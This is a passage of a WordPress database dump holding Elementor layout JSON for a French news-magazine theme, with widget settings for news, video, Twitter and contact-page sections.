ain_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(492,360,'_elementor_version','0.4'),(493,361,'_elementor_template_type','page'),(494,361,'_elementor_edit_mode','builder'),(495,361,'_elementor_data','[{\"id\":\"gjreoyl\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"classic\",\"background_color\":\"\",\"background_image\":{\"id\":358,\"url\":\"http:\\/\\/demo7.magzma.com\\/wp-content\\/uploads\\/sites\\/8\\/2017\\/02\\/photo-1469920783271-4ee08a94d42d.jpg\"},\"background_position\":\"center left\",\"background_attachment\":\"scroll\",\"background_repeat\":\"\",\"background_size\":\"cover\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#000000\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":\"0.9\"},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"ebhzbvx\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"rnsxoek\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"1\",\"the_title\":\"Contact Us\",\"title_size\":\"h2\",\"typography_title_typography\":\"\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"center\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"#ffffff\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e1e1e1\",\"text_bg_color_7\":\"#61c436\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"tnzayvk\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"800\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"